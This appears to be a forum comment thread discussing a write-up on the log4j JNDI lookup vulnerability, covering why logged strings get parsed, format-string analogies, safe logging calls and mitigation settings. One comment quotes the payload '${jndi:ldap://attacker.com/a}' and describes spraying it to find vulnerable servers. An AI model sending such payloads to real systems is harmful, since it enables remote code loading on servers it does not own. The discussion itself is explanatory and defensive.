Thanks for the write-up but I have a few questions. Why does log4j's .log() method attempt to parse the strings sent to it? It is the last thing I would expect it to do. Is the part in the sample code where the user's input is output back to them part of the exploit? If so how does it fit into the attack? What will the attacker see beyond the string they originally sent as input?
Could you update your mitigation steps to explain how to set the "log4g.formatMsgNoLookups" config? It's not clear whether this is a property that goes into the log4j config or into the JVM args.
When log4j is handed the string "${jndi:ldap://attacker.com/a}", it attempts to load a logging config from the remote address. The attacker can test for vulnerable servers by spamming the payload everywhere, and then seeing if they get requests (DNS requests for a subdomain, probably).
It's listen in the log4j docs here[0] as a feature. Funny enough, they actually call out the security mitigations they have in place for this in there with:
"When using LDAP only references to the local host name or ip address are supported along with any hosts or ip addresses listed in the log4j2.allowedLdapHosts property."
... I'm guessing they must have broken this, or the exploit found a bypass for those? I'll do some digging and update the blog post if I find anything interesting.
Fundamentally this is a format string attack. You're not supposed to do "log.info(user_supplied_stuff)", you're supposed to do "log.info("User sent: %s", user_supplied_stuff)".
Java is uncannily good at repeatedly allowing code execution via data misinterpretation across the board. The way it does serialization makes it impossible to secure. Templating libraries have forever been an issue. Endless extensibility in-line with data is a curse.
I'm not the grandparent, but there's been a slew of deserialization-related vulnerabilities in Java and .NET libraries where user input is used to instantiate arbitrary classes and invoke methods on them.
I'm not sure that's related here? Jackson is a JSON and XML serialiser/deserialiser, and it has a bunch of ways to automatically serialise and deserialise things into objects, without being provided a template. This is where the danger lies, if you just let it do its thing it can be exploited as it will load classes that the input data asks for. There have been a number of RCEs about this in recent years
I'm not sure what that has to do with the performance of concurrenthashmap under heavy collisions... ?
If I understand correctly most of the query params or POST body JSON gets mapped to a hashmap via Jackson and then POJOs gets created which can actually be an attack vector in terms of collison.
OH fair enough, that's not the attack vector that I was referring to, which is a more simple "deserialise me to something that I can use to compromise you" message, but it's another interesting vector!
What benign purpose does this feature serve and why does it have to be implemented by parsing the input string? Does the input string get modified before being written into the log?
I'll ask again because the information presented so far both in this thread on GitHub and on Twitter has been very lacking: is it necessary to return the input string back to the attacker in the response to their request in order for them to exploit this bug as you are doing in your example code?
JNDI is an interface to many kinds of naming and directory services. One common-ish use case in enterprise software is to use it as a sort of internal directory inside an application. In particular, the prefix "java:comp/env" identifies a namespace which contains configuration for the current component (servlet or EJB). So it might be rather useful to do a lookup in that when writing log messages. For example, you could have some common utility method shared by multiple components that looks up the current component name and includes it in the log output, so you can tell which component was making a request to the utility method.
The easiest way to support this would just be to allow JNDI lookups from log strings. Unfortunately, that enables all sorts of lookups!
IMHO, the real bug here is that the LDAP JNDI provider will load class files from arbitrary untrusted sources. That is an obviously terrible idea, regardless of whether JNDI is being used from a logging string or somewhere else.
The question isn't about the purpose of the feature. The question is why it's implemented with string parsing.
In C, it's unsafe to do
printf(string_variable);
because variable will get parsed as a format string. The way to solve the vulnerability is
printf("%s", string_variable);
Is that the same in Java logging libraries? Is it well-known that the logged value will be parsed? What's the safe way to log a value in Java exactly, knowing that nothing will parse that value?
What gets parsed is a string that tells the server to make a request to another server. If you use a weird protocol for that, like jndi:ldap, you can then return a class which will be automatically loaded.
So the code injection happens as the response to the remote request. The part the logger plays is that you can initiate that remote request by having the logger log some special string.
1. Attacker-controlled data is being parsed as code (format code, not Java code). I'm not sure to what degree this is the logging library's fault vs programmer error passing attacker-controlled data as a format string. I know in Go, the standard libraries take care to help programmers avoid this problem by making sure to have the character "f" in the function name to indicate the function parameter is a format string. log.Print() takes data, log.Printf() takes a format string, log.Fatal() takes data, log.Fatalf() takes a format string.
2. The format string syntax contains significantly exploitable features if an attacker can control it. This is the same as in C, because in C, printf() contains exploitable features. This is not the case in Go, because the worst the attacker can do in Go is cause the formatting to be strange or the .String() or .Error() methods to be called on the other inputs.
Note that even without 2, 1 is still a correctness problem. If I want to log attacker-controlled data, I want it to display accurately. If the attacker's User-Agent header contains weird characters, I want those to be logged exactly, not inadvertently transformed into something strange by my library.
It's not the same in Java logging libraries. You can write `logger.info("a={}")` and it won't cause any issues. At least that was the case before I read about this misfeature. I still think that log4j did absolutely wrong thing, because there are billions of lines like `logger.info("a=" + a)` and nobody's going to rewrite those lines. Breaking trust in logging library doing sane thing is absolutely terrible approach. I'm going to stick to logback everywhere I can, hopefully they did not do those stupid things.
Safe way should be something like `logger.info("a={}", a)`. Of course nobody's preventing log4j to parse any argument in any way they like. And they actually do. So with log4j there's no safe way it seems.
You can try to use context in the logging messages, e.g. the ID of the entity you are currently processing (from the HTTP request), but which might for whatever reason not be available in the code (e.g. you don't want to drill it several methods deep)
As a possible solution you can set MDC variables at the higher level, they are bound to the current thread, and reference them in the format string, and unset them after processing the entity. It's not a great solution due to temporal coupling, and you typically print it outside of an individual logging statements (e.g. add it to all logging statements), but it definitely beats drilling dozens of methods with the diagnostic identifiers.
To my knowledge JNDI is a monitoring interface allowing you to get various system values like the number of threads, heap size, process ID, etc. Somehow it's capable of being connected to LDAP.
It sounds like a classic X-to-Y-to-Z problem. Someone connected X to Y thinking Y was pretty safe even with untrusted input, not knowing it would ever proxy to Z (probably, everything you can do with JNDI on a local machine is safe). Someone else connected Y to Z thinking that Y is only passed trusted values so the new proxy feature could only be triggered deliberately. And here we are. This class of bug should have a name but probably doesn't.
And another person didn't document well that log messages must be trusted input...
JNDI was the "Java Naming and Directory Interface", part of the suite of CORBA-like Java-only distributed object tooling.
My guess is that the "lookups" feature in log4j assumed that all URL protocols were "http:" or "https:" and didn't account for either the full set of built-in protocol handlers or the fact that an application can register additional protocol handlers.
"When using LDAP only references to the local host name or ip address are supported along with any hosts or ip addresses listed in the log4j2.allowedLdapHosts property."
Those config measures were put in place as part of the fix for this issue. I.e they didn't exist before the fix was released.
The method that they're exploiting is akin to printf("whoops this is a format string"). The right way to handle user input in one of these is log.error("here's my user-provided input: {}", userInput) rather than log.error(userInput)
The string that is vulnerable is actually not meant to be user input, but a formatting string.
EDIT: nevermind, the issue apparently arises outside of formatting strings—though it would have been nice if the example had demonstrated this.
The issue occurs in incorrect logging code such as:
> logger.info("Data: " + data);
But the correct way of logging the above data is:
> logger.info("Data: {}", data);
It's analogous to using something like the following in C:
> printf(data);
In the incorrect cases (log4j or C), the user input is being used as a format string, and the user can likely cause an RCE. This is an issue in C for reasons that should be obvious. Java has historically been used very reflectively, so whenever there's some expression interpreter or deserialiser involved, there's a good chance it could be RCEd with arbitrary input.
It was a few months ago, but if I recall correctly, there were two overrides for info (and the other equivalent methods). info(String, String...) would do {} expansion like you mentioned, but info(String) would log the string directly, not doing format expansion on it.
I'm not sure how this interacts with the RCE issue reported here.
EDIT: That's because I was thinking of Slf4j, which has additional smarts here.
I'm not aware of that feature, but I guess it would mitigate this issue, since the problematic code:
> logger.info("Data: {}");
would effectively turn into something safe:
> logger.info("{}", "Data: {}");
And the issue would only arise if someone mixes the two patterns:
> logger.info("Data for " + username + ": {}", data);
Overall, I don't like the sound of that feature, since it blurs the line between correct and incorrect use of the logging API. The first argument should always be a constant formatting string.
Why though? It is not typical in Java to use format strings, unless you call String.format explicitly. It's not like C where printf-style APIs are common.
It should work one way or the other, not both. For current logging APIs, the format string is used. It actually turns out that the call using string concatenation corresponds to log4j1 rather than log4j2 (looks like this was an error in the post, though it's being fixed to use log4j2).
I guess aesthetically you could argue either way, but I think the main purpose of the formatting string method is that you can write:
> logger.trace("Updates: {}", longListOfUpdates);
and if trace logging is disabled (which can be done dynamically), it's not going to invoke `longListOfUpdates.toString()`, which is what happens when you perform string concatenation. If it didn't work that way, I suspect people would end up writing extra `logger.isTraceEnabled()` conditions around their logging code.
Could you update your mitigation steps to explain how to set the "log4g.formatMsgNoLookups" config? It's not clear whether this is a property that goes into the log4j config or into the JVM args.